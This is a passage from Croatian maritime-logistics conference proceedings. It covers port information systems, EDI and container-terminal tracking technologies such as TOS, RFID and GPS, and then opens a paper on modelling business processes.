PKI sustav povjerljivost podataka osigurava korištenjem privatnog i javnog ključa, te certifikata koji identificira korisnika.' Osnovni princip sustava je sigurno pohranjivanje tajnog ključa koji mora biti dostupan i poznat samo korisniku. Korisnički certifikat, u kojem se nalazi javni ključ, je dostupan svima i najčešće se pohranjuje pomoću LDAP imeničkog servisa. Korištenjem kombinacije tajnog i javnog ključa prilikom slanja poruke, sadržaj poruke se kri- ptira čime poruka postaje nečitljiva. Primjenom pripadajućeg tajnog ključa, koji svaka osoba u PKI sustavu čuva za sebe, poruka se dekriptira te nanovo postaje čitljiva. Dodatna sigurnost se postiže upotrebom višenamjenske pametne kartice (smartcard) za pohranu korisničkih ključeva i certifikata. Certifikat ili digitalni potpis (digital ID) je dodatak koji se dodaje digitalnom dokumentu i služi kao autentifikacija osobe ili računala koje koristi neku uslugu, aplikaciju ili komunicira s drugim korisnicima putem Interneta ili drugačije.''49

3.3. PREDNOSTI KORIŠTENJA INFORMACIJSKOG SUSTAVA U LUČKOM POSLOVANJU

Prednosti su vidljive već iz grupa podataka koje sustav pruža. Treba naglasiti i ulogu u donošenju poslovnih odluka . Rukovodstvo luke može na temelju podataka donositi brze i 48 http//:www.carnet.hr (09.06.2014) 49 http://www.carnet.hr (09.06.2014.)


107

pravilne odluke što je jako važno u uvjetima kontinuiranih promjena na tržištu. Funkciona- lnost i prednost elektroničkog poslovanja u lukama ogledala bi se u sljedećem:50

• 1. Podaci o najavama i pokretima brodova stalno su svima na raspolaganju, • 2. Dodjela resursa po smjenama: grupa radnika, mehanizacija, skladišni

prostor, vagoni,... • 3. Kontinuirano ažuriranje podataka, • 4. Izrada operativnih planova u zadanim terminima i • 5. Brzo postupanje u izvanrednim situacijama.

Iako se prednost elektroničke razmjene dokumenata ubraja već u prednosti informacijskog sustava u lukama, bilo bi uputno zasebno sagledati prednosti elektroničke razmjene dokumenta (EDI- Electronic data Interchange).

Prednosti EDI sustava su:51

• 1. Smanjenje papirologije u kreiranju i arhiviranju, • 2. Poboljšanje preciznosti usljed smanjenja ručne obrade, • 3. Povećanje brzine prijenosa narudžbi i ostalih podataka, • 4. Smanjenje adminstrativnih napora za unošenje podataka, slanje poštom i

druge zadaće, • 5. Smanjenje cijene davanja narudžbi, obrade i rukovanja, • 6. Poboljšani pristup informacijama zbog brzine potvrde i obavjesti o ukrcaju, • 7. Smanjenje poslovnog opterećenja i poboljšanje točnosti u ostalim odjelima,

povezujući EDI sa srodnim sustavima, kao što je bar-code tehnologija i elektronski prijenosni fond i

• 8. Smanjenje inventara poboljšanjem točnosti i smanjenjem vremenskog ciklusa narudžbe.

4. PRIMJENA INTELIGENTNIH SUSTAVA NA KONTEJNERSKOM TERMINALU

U suvremenim uvjetima poslovanja kontejnerskih terminala nije moguće na efikasan način organizirati aktivnosti i procese bez učinkovitih informacijskih tehnologija koje moraju omogućiti planiranje, organiziranje, koordiniranje i kontroliranje svih aktivnosti i povezivanje subjekata lučkog sustava. Kontinuirano nastojanje da se smanje troškovi, pove- ća konkurentnost i ostvari približavanje korisnicima zadovoljavajući sve njihove zahtjeve čine upravljačke i informacijsko-komunikacijske sustave neophodnima za poslovanje kontejnerskih terminala.

"Prednosti uvođenja sustava elektroničke obrade podataka na kontejnerskim terminalima jesu: prikupljanje informacija na vrijeme i vjerodostojno, bolja organizacija prikupljenih podataka, mogućnost prijama novih informacija u kratkom vremenu, jednostavno 50 Dundović, Č., Kolanović, I., Poletan J., T.: Implementacija informacijsko-komunikacijskih tehnologija u lukama, Pomorstvo, 2005. (str. 122.) 51 Dundović, Č., Kolanović, I., Poletan J., T.: Implementacija informacijsko-komunikacijskih tehnologija u lukama, Pomorstvo, 2005. (str. 118.)


108

razotkrivanje podataka u praktičnom i prihvatljivom obliku, obrada i brza usporedba velikog broja podataka, mogućnost primjene na manjim terminalima, smanjenje količine papirnate dokumentacije i broja službenika u uredima."52

4.1. INFORMACIJSKI I KOMINIKACIJSKI ASPECT INTELIGENTNIH TRANSPORTNIH SUSTAVA NA KONTEJNERSKOM TERMINALU

Neosporno je da su komunikacijske i informacijske tehnologije postale osnova posti- ndustrijskog društva, novog svjetskog poretka koji je u razvoju. Informacijske i komunikacijske tehnologije osnova su implementacije suvremenih logističkih procesa na kontejnerskim terminalima. Jedna od najvažnijih uloga informacijsko komunikacijskih tehnologija je mogućnost povezivanja kontejnerskih terminala s drugim subjektima u lučkoj zajednici, stva- rajući na taj način elektroničku zajednicu lučkog sustava. Efikasne i pouzdane lučke logističke usluge uvelike ovise o informacijsko-komunikacijskom sustavu koji može stvoriti značajne uštede u lučkom logističkom lancu. Ovaj sustav je potpora "just in time" konceptu koji je ujedno i najvažniji način poslovanja kontejnerskih terminala.

Postoji više informacijsko-komunikacijskih sustava na kontejnerskim terminalima. Razlikuju se po softverskim rješenjima pojedinih proizvođača no svi imaju istu svrhu. Najva- žniji zadatak ovih sustava na kontejnerskim terminalima je planiranje prekrcajnih aktivnosti. Najvažniji sustav za koordiniranje i kontroliranje svih aktivnosti na kontejnerskom terminalu je sustav TOS (Terminal operating sistem) tj. sustav za prekrcajne aktivnosti.

TOS je sustav za direktno planiranje prekrcajnih operacija na terminalu. Funkcije TOS sustava su praćenje:53

• 1. Statusa kontejnera što podrazumijeva veličinu, težinu, tip, posebna uputstva, sadržaj kontejnera,

• 2. Resursa, što obuhvaća slobodne operativne površine i površine za slaganje kontejnera, lokacija opreme,

• 3. Ograničenja, što podrazumijeva karakteristike operativne površine, potrebnu opremu,

• 4. Procesa, optimalno slaganje kontejnera, prioriteti u prekrcaju. Svaki od sustava mora biti povezan sa adekvatnom bazom podataka. Točni i brzi

podaci ključni su za uspješan rad ovih sustava.

4.1.1. Informacijski aspect inteligentnih transportnih sustava na kontejnerskom terminalu

Svaki informacijski sustav djeluje u kontekstu koji podrazumijeva političko, pravno i ekonomsko okruženje, a koja uključuju pravila, poslovne procese, tehnike menadžmenta te ljudska i organizacijska ograničenja. Ključ uspješnog razvoja sustava je razumijevanje načina na koji položeni informacijski sustav međusobno djeluje s okolinom u kojoj će funkcionirati.

Prva velika revolucija u transportu dogodila se istovremeno s uvođenjem elektro- magnetske komunikacije, koja je omogućila širenje informacija o kretanju roba i ljudi znatno 52 Dundović, Č., op. cit., str. 127. 53 Tijan, E., Agatić, A., Hlača, B.: Ict evolution in conteiner terminals, Scientific Journal of Maritime Research, Vol.24 No.1, lipanj 2010. (str. 29.)


109

brže od stvarnog transporta tereta ograničenim brzinama. "Moderna transportna mreža sastoji se od dva glavna dijela, a to su: mreže informacija, koju obilježava prijenos impulsa u bina- rnom obliku i mreže transporta tereta, koja prenosi robu i ljude."54 Dostupnost računalnih strojeva potaknula je drugu veliku revoluciju transportnih sustava, u kojoj su brza i precizna računala iskorištena za efikasno kontroliranje i koordiniranje prometnog sustava. Inteligentni transportni sustavi pokrivaju širok raspon tehnologija, kojima je cilj povećanje djelotvornosti, učinkovitosti i sigurnosti postojećih transportnih sustava i kao takvi izravno su povezani s izgradnjom informacijskih sustava s ciljem boljeg upravljanja transportnim sustavima. Raspo- laganje informacijama u stvarnom vremenu osnovni je uvjet uspostave srži ITS-a. Informacije služe operaterima kao pomoć u optimiziranju tokova složenih sustava i korisnicima kako bi mogli djelotvorno planirati i odlučivati.

Informacijski sustav u lukama kao i na kontejnerskim terminalima mora omogućiti sljedeće funkcije:55

• 1. Ubrzanje operacija ukrcaja/iskrcaja tereta, • 2. Usklađivanje vremena izvođenja fizičkih i administrativnih operacija radi pru-

žanja usluge korisnicima kako bi ubrzali prometni tok i omogućili lučkom sustavu optimalno korištenje infrastrukture,

• 3. Pružanje informacijske podrške interesnim skupinama - informacijski sustav mora omogućiti pristup i korištenje općih programa i aplikacija te portal prema interesnim skupinama,

• 4. Uspostavu veza s vanjskim bazama podataka, • 5. Rukovanje informacijskim tokom dopuštajući međusobne veze različitih inte-

resnih skupona i korištenja specijaliziranih izvora, osiguravajući sigurnost i povjerljivost podataka,

• 6. Optimizaciju toka novca kroz brži i jednostavniji ciklus usklađen s tokom tereta, • 7. Upravljanje infrastrukturom na način da se optimizira korištenje kritičnih resursa.

4.1.2. Komunikacijski aspekt inteligentnih transportnih sustava na kontejnerskom terminalu

Komunikacijski sustavi ITS-a služe povezivanju njegovih komponenta i omogućuju predstavljanje, razvoj i djelotvornu primjenu širokog aspekta korisničkih usluga ITS-a, pri čemu su ključne sljedeće aktivnosti:56

• 1. Korištenje različitih komunikacijskih usluga: prijenos govora, podataka, slika, video, signal i telemetrijski signali, upotreba različitih vrsta terminala (staciona- rni, prenosivi, ugradivi),

• 2. Potpora komunikacijI između središnjih ureda i ostalih sudionika na kontejnerskom terminalu u vertikalnom smislu,

• 3. Potpora komunikaciji između sudionika prometa u horizontalnom smislu, na- ročito onih čije se putanje isprepliću,

54 Jolić, N., Luke i ITS, Zagreb, Sveučilište u Zagrebu, Fakultet prometnih znanosti, 2008., str., 135. 55 Jolić, N., Luke i ITS op.cit. (str. 191.). 56 Ibidem (str. 201.)


110

• 4. Potpora komunikaciji između središnjih ureda i pružanja usluga neposredno vezanih za promet (policija, hitna pomoć, inspektorati, službe održavanja),

• 5. Pružanje usluga mobilnim i fiksnim korisnicima usluga kontejnerskog terminala neovisno o njihovom zemljopisnom položaju,

• 6. Osiguranje visoke kvalitete usluge i zaštićenosti povjerljivih informacija.

Sva rješenja ITS sustava mogu se podijeliti u tri osnovne kategorije, a to su: staciona- rne (žične) komunikacije koje omogućuju komunikaciju između nepokretnih elemenata ITS infrastrukture, zatim širokopojasne pokretne (bežične) komunikacije koje omogućuju komunikaciju između pokretnih elemenata ITS-a i nepokretnih elemenata komunikacije infrastrukture na širokom području. Posljednje u nizu kategorija komunikacijskog sustava ITS-a jesu usko i širokopojasne pokretne (bežične) komunikacije koje omogućuju komunikaciju između pokretnih elemenata ITS-a i nepokretnih elemenata komunikacijske infrastrukture na uskom području.

4.2. SUSTAVI ZA UPRAVLJANJE KONTEJNERSKIM TERMINALIMA

U zadnjih deset godina kontinuirani rast prometa u svjetskoj pomorskoj trgovini se udvostručio. Konkurirati mogu samo one luke koje prate razvoj suvremenih transportnih tehnologija. Potreba da svaki kontejner bude pod nadzorom dovodi do razvoja sustava za identifikaciju i praćenje kontejnera.

4.2.1. Nadzor i praćenje na kontejnerskim terminalima

Nadzor i praćenje kontejnera na kontejnerskim terminalima jedan je od glavnih problema za brodska poduzeća i carine. Zbog tog razloga prionulo se razvitku tehnologija koje će omogućiti poboljšanje globalne vidljivosti kontejnera te uštedjeti troškove prilikom gubitka ili oštećenja. Sve pomorske institucije, posebno lučke uprave, u svoje informacijske sustave implementiraju novije informacijske tehnologije u stalnoj težnji za ubrzanjem i olakšavanjem protoka podataka i informacija. Svrha tih servisa je poboljšanje učinkovitosti i kontrole nad kontejnerima kao i pružanje točnih i pouzdanih informacija korisnicima. Svi subjekti koji sudjeluju u kontejnerskom prijevozu, a osobito krajnji korisnik, moraju u svakom trenutku raspolagati točnim podacima. Proučavanje sustava praćenja tereta podrazumijeva u pravilu promatranje kontejneriziranog tereta. "Kontejneri se opremaju senzorima za očitanje temperature, vlažnosti, vibracija i stanja vrata koji imaju uspostavljeno sučelje s kontrolorom kontejnerske jedinice"57 Pomoću ovih sustava moguće je dobiti lokaciju tereta u realnom vremenu, njegovo stanje, fotografije, ažurirane podatke te detalje isporuke. Na taj način korisnik može u bilo kojem trenutku dobiti informacije o stanju pošiljke, putem Inte- rneta ili mobilnog poslovanja. "Jezgra sustava za upravljanje kontejnerskim terminalima je GNSS tehnologija za praćenje koja se koristi u kombinaciji sa komunikacijskim tehnologijama (sateliti, mobiteli, Wi-Fi). Na taj se način osigurava kontroliran praćenje u realnom vremenu i praćenje svih resursa tijekom putovanja."58 Te je informacije moguće poslati na server i vizualizirati pomoću geografskog informacijskom sustava (GIS) gdje se svaka stavka može posebno pratiti (mjesto, zaustavljanje, prazni hod, itd.) Kontrola trenutne pozicije kontejnera

57 Ibidem (str. 182.) 58 Bonaca, J., Černjul, R., Vaclavek, S.: Sustavi za upravljanje kontejnerskim terminalima podržani GNSS-om i GIS-om, Ekscentar, 2013. (str. 72.)


111

nije uvijek moguća te je ograničena zastarjelim načinom kontroliranja kao što je čitanje bar koda kontejnera i to uglavnom ručno. "Kao rješenje ovog problema nudi se RFID tehnologija, jedna od najčešće korištenih tehnologija identifikacije temeljena na principu čitača."59

Tri su glavne vrste korisnika GPS praćenja kontejnera u globalnoj logistici poslovanja, a to su: institucije države, pružatelji logističkih usluga i stvarni korisnici tereta. Institu- cije države su najviše zabrinute curenjem tereta iz kontejnera tijekom prijevoza te je njihov zadatak da dospjeli teret puno i pravilno oporezuju. Drugi pokretač korištenja ovog sustava je sigurnost. Naime, vlasti brinu o kretnju ilegalnih, opasnih materijala i predmeta unutar kontejnera. Svi podaci koji su potrebni za kretanje tereta nalaze se unutar jedne platforme, a takav pristup omogućuje vladama da budu neprekidno informirane. S druge strane, pružatelji logi- stičkih usluga kreću se od nižih pružatelja usluga koji su specijalizirani za kretanje pojedinih vrsta robe, do brodara širokih razmjera i njihovih industrijski proizvedenih roba. Sve više vlasnika robe okreće se pružatelju usluga za praćenje kontejnera kako bi osigurali jednostavnu tehnologiju za praćenje i locirali vlastiti kontejner i teret. To uključuje praćenje kontejnera dok je u pokretu ili dok je na kontejnerskom teminalu u luci.

Pri proučavanju sustava praćenja tereta važan je transportni tok kontejnera. Lučki sustav je dio transportnog sustava te transportni sustav počinje od pošiljatelja i završava kod primatelja. U skladu s tim, sustav praćenja i nadzora treba obuhvatiti cijeli tok. "Sustav pra- ćenja tereta pridonosi aktivnostima usklađivanja fizičkih i administrativnih operacija radi pružanja usluge korisnicima kako bi ubrzali logistički ciklus i omogućili lučkom sustavu optimalno korištenje infrastrukture."60 Sustav praćenja brodova ima tehničku podršku u primjeni tehnologije transpordera i odgovarajuće komunikacijske infrastrukture odnosno u mo- bilnik komunikacijskim sustavima (GSM) i sustavu određivanja položaja (GPS). Sustav za praćenje kontejnera na terminalima ima brojne prednosti. Poboljšanje operativne učinkovitosti voznog parka omogućuje tvrtkama optimizaciju i planiranje resursa, povećanje broja usluga i korištenje najoptimalnijih putova.

Glavne prednosti sustava su:61 • 1. Sigurnost kontejnerskih vrata - nakon neovlaštenog otvaranja vrata kontejnera

upravitelju se šalje neposredno upozorenje o pristupu i kretanju kontejnera, • 2. Praćenje - korisnik može dobiti podatke o lokaciji u stvarnom vremenu te time

upravljati obiljem informacija, • 3. Nadzor kontejnera - uređaji uključuju niz telemetrijskih senzora koji mogu

otkriti svjetlost koja ulazi u kontejner što se može pokazati korisnik u slučaju sabotaže kontejnera, te imaju mogućnost nadzora temperature i ubrzanja u slučaju pada kontejnera.

4.2.2. Primjena sustava za upravljanje kontejnerskim terminalima

CTS (Container Tracking Service) je sustav za praćenje kontejnera koji koristi LEO (Low Earth Orbital) satelite za pronalazak kontejnera u minimalnom vremenu.62 LEO redovito prikuplja potrebne podatke i šalje ih na web server ili po potrebi PC klijenta. Na taj način brodske tvrtke i carine dobivaju važne informacije poput statusa o vratima, temperaturi i 59 Ibidem 60 Jolić, N., op. cit., str. 182. 61 Bonaca, J., Černjul, R., Vaclavek, S., op.cit. (str. 73.) 62 Ibidem


112

uređajima unutar samog kontejnera. Ovaj se sustav sastoji od četiri glavna elementa, a to su antena, RF modul i baterija.

RFID je jedna od najčešće korištenih tehnologija identifikacije. Ova tehnologija predstavlja metodu automatske identifikacije koja omogućuje daljinski prijenos podataka putem radiovalova. Implementacijom ove vrste tehnologije omogućena je jednostavna, brza i jedi- nstvena identifikacija kontejnera. Tehnologija je temeljena na principu bežičnih čitača. Čitači pomoću radiovalova očitavaju najvažnije informacije o kontejneru i koriste se najviše kada se kontejneri odlažu na slagalište. Korištenjem rendgenskih skenera skenira se cijeli sadržaj kontejnera na principu nendgenske snimke. Svakom kontejneru dodjeljuje se RFID transponder. Pri pokušaju neovlaštenog otvaranja kontejnera automatski se aktivira alarm ili kratka SMS poruka, a istovremeno upravljačka kutija izravno šalje podatke kontrolnom sustavu na brodu i satelitu koji prenosi informacije do upravljačkog centra na kopnu. Podaci prikupljeni ovim načinom tehnologije prije svega pridonose smanjivanju krijumčarenja i povećanja nacionalne sigurnosti. Vlast u svakom trenutku može locirati sumnjivi kontejner te ga kontrolirati, kako na brodu tako i na skladištu. Zahvaljujući GPS sustavu pouzdano se znaju lokacija i status svakog pojedinog kontejnera i broda, a time je moguće izračunati broj prevezenih kontejnera odnosno ekonomičnost poslovanja broda. "RFID sustav čine tri osnovne komponente, a to su: RFID transponder, RFID čitač i Middleware (skup programskog sučelja koji filtrira podatke očitane s transpondera)."63

WEB GIS aplikacija razvija se paralelno sa sve većom dostupnošću novih tehnologija. Internet otvara novo tržište prostornih podataka i na taj način pruža razne usluge korisnicima iz područja geoinformatike. Prednosti ovakvih sustava su dostupnost koja nije ograničena hardverom ili softverom. One su namjenjene različitim skupinama korisnika pa su tako primjenu pronašli i pri upravljanju kontejnerskim terminalima. Ovaj sustav s vrlo jedno- stavnom globalnom kartom može predočiti točnu lokaciju kontejnera. Korisnik može vrlo lako odabrati kontejner od interesa i pretraživati željene podatke. Osim točne visine i širine sustav omogućava i mnoge druge korisne informacije.

4.3. VIRTUALNA LOGISTIKA NA KONTEJNERSKIM TERMINALIMA

Razvojem moderne logistike i potrebe za smanjenjem transportnih troškova uz velike mogućnosti informacijsko-komunikacijskih tehnologija, došlo je do pojave i razvoja tzv. virtualne logistike, koja je već implementirana u nekim većim kontejnerkim lukama poput luka u Rotterdamu, Hamburgu ili Singapuru. Virtualna logistika obrađuje fizičke i informacijske aspekte logističkih operacija. Vlasništvom i kontrolom resursa upravlja se putem internet aplikacija. Orijentacija kontejnerskih terminala na sustav virtualne distribucije, skladišta i zaliha omogućuje značajne uštede u vremenu i trošku isporuke uspostavljanjem distribuci- jskih centara bliže korisniku i korištenjem informacijskih tehnologija. Korisnik putem ove tehnologije može u svakom trenutku, jednostavnim korištenjem Internet aplikacija, znati sve potrebne podatke o količini i dostupnosti robe koja se nalazi na samom kontejnerskom terminalu, a koja je otpremljena iz kontejnerskih terminala ili se tamo doprema.

Promatrajući sa stajališta korisnika usluga kontejnerskih terminala, prednosti korištenja virtualne logistike su sljedeće:64

• 1. Kraće vrijeme isporuke,

63 Ibidem (str. 74.-75.) 64 Tijan, E., Agatić, A., Hlača, B., op. cit. (str. 38.)


113

• 2. Pregled dostupnosti robe putem internet aplikacija, • 3. Bolja dostupnost robe u distribucijskim centrima bliže korisnicima, • 4. Smanjenje mogućnosti oštećenja robe izbjegavanjem otvaranja kontejnera u

regionalnim centrima, • 5. Homogeniziran prijevoz i • 6. Standardizacija pakiranja. Čitavi sustav mora biti temeljen na prikladnim informacijsko-komunikacijskim te-

hnologijama, te biti razumljiv svim subjektima koji ga koriste. Virtualna logistika ima neu- pitne prednosti u upravljanju logističkim resursima te će u budućnosti sigurno postati dio poslovanja svih naprednijih kontejnerskih terminala.

5. ZAKLJUČAK

Razvoj tehnologije nije zaobišao niti područje lučkog poslovanja. Osim toga što su svjetski lučki terminali opremljeni strojevima visoke tehnologije, opremljeni su i najmodernijim informacijskim sustavima i sustavima elektroničkog poslovanja. Jedan od glavnih razloga za uvođenje elektroničkog poslovanja u lučke terminale jest koordinacija rada svih lučkih subjekata. Stoga se, kao jedan od najvažnijih zadataka informacijsko - komunikacijskih sustava na kontejnerskim terminalima, ističe planiranje prekrcajnih aktivnosti.

Napredak informacijsko – komunikacijskih tehnologija rezultirao je razvojem spe- cifičnih računalnih metoda. Različiti sustavi identifikacije i praćenja kontejnera olakšavaju utvrđivanje sadržaja kontejnera te praćenje kontejnera unutar, ali i izvan lučkog područja.

Isto tako, nezaustavljivi tehničko - tehnološki razvoj utjecao je na povećanje lučkih kapaciteta i uvođenje novih promjena na kontejnerskim terminalima. Jedna od važnijih promjena je svakako uvođenje ITS sustava. On je upravljačka i informacijsko - komunikacijska nadogradnja klasičnog prometnog i transportno-logističkog sustava s bitnim poboljšanjima za mrežne operatere, davatelje usluga, korisnike, te društvo u cjelini. Operaterima kontejnerskih terminala na raspolaganju su različiti informacijsko-komunikacijski sustavi kojima se mogu detaljno isplanirati sve aktivnosti i osigurati pravilan rad cijelog kontejnerskog terminala, a koji će se zati, povoljno reflektirati na cijelu lučku zajednicu i omogućiti pružanje kvalitetne usluge koja vodi zadovoljenju potreba krajnjeg korisnika. Uvođenje ITS sustava na kontejnerskim terminalima dovelo je do pojednostavljenja aktivnosti i smanjenja udjela ljudskih resursa u radu kontejnerskih terminala.

Značajan i kontinuiran napredak informacijsko-komunikacijskih tehnologija omo- gućuje planiranje i izgradnju kontejnerskih terminala, planiranje potrebnih prekrcajnih sre-dstava, planiranje optimalne veličine manipulativnih površina čime se spriječavaju nepro- fitabilna ulaganja. Iako su troškovi uvođenja ovih tehnologija na kontejnerskim terminalima veliki, potrebno je osigurati sredstva jer jedino na taj način kontejnerski terminali svoje usluge mogu pružati učinkovito i time u potpunosti zadovoljiti potrebe korisnika.


114

LITERATURA

POPIS KNJIGA

1. Čerić, V., Varga, M., Informacijska tehnologija u poslovanju, Element, Zagreb, 2004. 2. Dundović, Č.: Lučki terminali; Svučilište u Rijeci, Pomorski fakultet u Rijeci, Rijeka, 2002. 3. Garača, Ž: Poslovni informacijski sustavi, Skroza, Split, 2008. 4. Jolić, N., Luke i ITS, Zagreb, Sveučilište u Zagrebu, Fakultet prometnih znanosti, 2008. 5. Panian Ž., Ćurko, K., Bosilj-Vukšić, V., Čerić, V., Pejić-Bach, M., Požgaj, Ž., Strugar, I.,

Spremić, M., Varga, M.:Poslovni informacijski sustavi, Element, Zagreb, 2010. 6. Srića, V., Informatika 3 – Informacijski sustavi, Školska knjiga, Zagreb, 2003. 7. Vlahović, N., Luić, Lj., Jaković, B., Zoraja, J., Gašpar, I., Milanović, Lj., Poslovni informacijski

sustavi: priručnik, Sveučilište u Zagrebu, Ekonomski fakultet, Zagreb, 2010. 8. Wicker, S. B.: Fundamentals of codes, graphs, and iterative decoding (electronic resource),

Kluwer Academic Publishers, Boston, 2003.

POPIS ČASOPISA

9. Dundović, Č., Kolanović, I., Poletan J., T.: Implementacija informacijsko-komunikacijskih tehnologija u lukama, Pomorstvo, 2005.

10. Hlača, B., Tijan, E., Agatić, E.: Evolucija informacijsko-komunikacijskih tehnologija na kontejnerskim terminalima;Pomorstvo, 24/1, 2010.

11. Poletan Jugović, T., Perić Hadžić, A., Ogrizović, D.: Importance and Effects of the Electronic Documents Implementation in the Service of Logistics-forwarder Operator, Pomorstvo, god.23., 2009.

12. Tijan, E., Kos, S., Ogrizović, D.. Disaster Recovery and Business Continuity in PortCommunity Systems, Pomorstvo, god.23., br.1., 2009.

13. Tijan, E., Agatić, A., Hlača, B.: Ict evolution in conteiner terminals, Scientific Journal of Maritime Research, Vol.24 No.1, lipanj 2010.

14. Bonaca, J., Černjul, R., Vaclavek, S.: Sustavi za upravljanje kontejnerskim terminalima podržani GNSS-om i GIS-om, Ekscentar, 2013.

15. Ćurko, K., Varga, M., Ekonomski fakultet, Zagreb, Mario Hegedues, INFORART, Zagreb (prezentacija u Power Pointu)

POPIST OSTALIH IZVORA

16. www.ss-strukovna-vvlatkovica-zd.skole.hr/upload/ss...zd/.../inf.doc (11.06.2014) 17. http://www.carnet.hr (09.06.2014.)

115

MODELIRANJE PROCESA PRI IZGRADNJI POSLOVNIH INFORMACIJSKIH SUSTAVA

Klara Meštrović, mag.ing.log. dr.sc. Saša Aksentijević doc.dr.sc. Edvard Tijan

1. UVOD

Poslovni procesi u poduzećima su mnogobrojni te za svako pojedino poduzeće različi- ti. Definicije poslovnih procesa su brojne, ali imaju zajedničke tvrdnje i značajke koje određuju njihovu ulogu i važnost u poslovanju poduzeća. U značajke poslovnih procesa se ubrajaju:65

− Orijentacija prema kupcima: poslovni proces treba osigurati vrijednost onome kome je namijenjen,

− Međufunkcijski, međusektorski i međukompanijski odnosi: poslovni procesi pre- laze granice funkcija, sektora i kompanija,

− Iz ruke u ruku: završen posao se predaje drugome da bi nastavio sa sljedećim poslom - koordinacija ove primopredaje je kritična točka oblikovanja,

− Informacijski tok oko procesa: osigurava izlaze i neophodne informacije za nadziranje procesa,

− Znanje kreirano oko procesa: omogućuje izvođenje procesa u različitim uvjetima, − Različite verzije umjesto jedne uopćene: poslovni procesi se različito odvijaju

ovisno o uvjetima, − Dodavanje vrijednosti procesima: poslovni proces čine radovi koji dodaju vri-

jednost, − Stupanj strukture procesa: procesi koji uključuju rad sa znanjem teže se uklapaju

u strukture od onih koji obuhvaćaju administrativni ili proizvodni rad. Stoga se može reći da je poslovni proces specifični proizvod ili usluga što označava

njegovu prepoznatljivost i mjerljivost, od velikog značaja za kupca ili korisnika te se izvodi samo na vanjski poticaj (organizacija ne troši resurse ukoliko nema kupaca ili korisnika).66

Sinteza gore navedenih tvrdnji rezultira općom i radnom definicijom poslovnih procesa koje glase:

− Poslovni proces je niz logički povezanih aktivnosti u kojima sudjeluju resursi organizacije zbog zadovoljenja potreba kupaca za proizvodima ili uslugama i stvaranja vrijednosti za poduzeće.67

65 Tijan E., Prezentacija sa predavanja – Poslovni informacijski sustavi: „Upravljanje poslovnim procesima“ 66 Brumec J., „Modeliranje poslovnih procesa“, Zagreb 2011, online: http://www.slideshare.net/Brumiko/modeliranje-poslovnih-procesa-uvod-u-bpmn (10.2.2014.) 67 Panian Ž. i suradnici; Poslovni informacijski sustavi; Element , Zagreb 2010, p. 125

Modeliranje procesa pri izgradnji poslovnih informacijskih sustava Zbornik radova Klara Meštrović; Saša Aksentijević; Edvard Tijan

116

− Radna definicija procesa – povezani skup aktivnosti i odluka koji se izvodi na vanjski poticaj radi ostvarenja nekog mjerljivog cilja organizacije. Troši vrijeme i pretvara ulazne resurse u specifične proizvode ili usluge od značaja za kupca ili korisnika.68

Ovaj rad nastao je kao nastavak istraživanja obavljenog prilikom izrade diplomskog rada Klare Meštrović, mag. ing.log., sačinjenog pod mentorstvom doc.dr.sc. Edvarda Tijana na Pomorskom fakultetu u Rijeci.

2. TEMELJNE ZNAČAJKE POSLOVNIH PROCESA

Poslovni proces je kontinuiran, što bi značilo da se isti proces odvija neprekidno, pona- vljajući se ispočetka. Stoga se može naglasiti da je jedna od najbitnijih karakteristika poslovnih procesa vremenski neodređeno trajanje. Pošto se isti proces kontinuirano ponavlja, on proizvodi isti rezultat svaki put kada se ponovo pokrene. Osobe koje se brinu za kvalitetno izvođenje poslovnih procesa pripadaju procesnom timu. Za razliku od projektnih timova, gdje je naglasak na trenutni projekt i znanja tima koja se isključivo tiču rada na projektu, procesni timovi su stalni te svoje znanje obogaćuju svaki put kada se ponovo pokrene proces. Stoga se može reći da se radni zadaci ponovo utvrđuju u skladu funkcionalnosti pojedinih poslovnih procesa.

Poslovni procesi se mogu svrstati u dvije osnovne skupine:69 • 1. Temeljni (primarni, ključni, središnji) procesi – stvaraju određenu vrijednost za

poduzeće, skup svih aktivnosti koje se odvijaju kako bi se dizajnirala, proizvela, promovirala, dostavila i pružila potpora proizvodnoj liniji,

• 2. Potporni (sekundarni) procesi – omogućuju uspješno funkcioniranje temeljnih procesa.

Trebaju biti uključeni u jedinstveni lanac vrijednosti, budući da je samo na taj način moguće realno pratiti i izračunavati troškove i ostvareni profit poduzeća. Prema polju djelovanja procesa unutar organizacije, oni se dijele na tri različite vrste:70

− Individualni procesi koje obavljaju pojedinci, − Vertikalni (funkcijski) procesi koji su dio funkcijske jedinice ili odjela

organizacije, − Horizontalni procesi koji prolaze kroz nekoliko funkcijskih jedinica. Radi lakšeg razumijevanja poslovnih procesa i njihovih podjela, prikazana je

hijerarhija poslovnih procesa. Ona se dijeli na: procese, potprocese, aktivnosti, zadatke i korake. Procesna hijerarhija posebice dolazi do izražaja u ključnim poslovnim procesima koji se protežu kroz cijelu organizaciju. Veliki poslovni procesi su sastavljeni od više potprocesa, koji djeluju svaki u svom području.71

68 Brumec J., op.cit. 69 Panian Ž. i suradnici; op.cit., p. 127 70Upravljanje poslovnim procesima u poduzećima Republike Hrvatske“, 2011, online: https://bib.irb.hr/datoteka/529970.UPRAVLJANJE_POSLOVNIM_PROCESIMA_U_PODUZEIMA_ REPUBLIK E_HRVATSKE.doc (6.3.2014.) 71 Bosilj Vukšić V., Hernaus T., Kovačić A.; Upravljanje poslovnim procesima – organizacijski i informacijski pristup, Školska knjiga, Zagreb 2008., p. 19.


117

Potprocesi su zapravo skupine aktivnosti koje obilježavaju djelatnost poduzeća, a zadaci su podskupina aktivnosti. Gledajući još detaljnije, određeni zadaci se trebaju raščlaniti na korake kako bi se efikasnije izveli.

Shema 1: Hijerarhija poslovnih procesa

Izvor: Bosilj Vukšić V., Hernaus T., Kovačić A.; Upravljanje poslovnim procesima –organizacijski i informacijski pristup, Školska knjiga, Zagreb 2008.; p. 18.

Hijerarhija poslovnih procesa, se može detaljnije prikazati pomoću dodavanja lanca vrijednosti čiji je koncept osmislio Michael E. Porter 1985. godine. Stoga se elementi procesne terminologije organizacije dijele na:72

− Lanac vrijednosti obuhvaća više poslovnih procesa, od razvoja novog proizvoda i naručivanja, do prodaje i potpore potrošaču nakon završetka prodaje pa se može smatrati središnjim procesom poduzeća (obuhvaća sve procese koji sudjeluju u realizaciji proizvodnje i prodaje proizvoda: proces razvoja novog proizvoda (istraživanje tržista, planiranje, dizajn, razvoj, testiranje, izrada dokumentacije), proces nabave za proizvodnju (naručivanje, pregovaranje, ugovaranje, zaprima- nje, skladištenje, plaćanje), proces proizvodnje, proces prodaje kupcu, proces potpore kupcu nakon završetka prodaje),

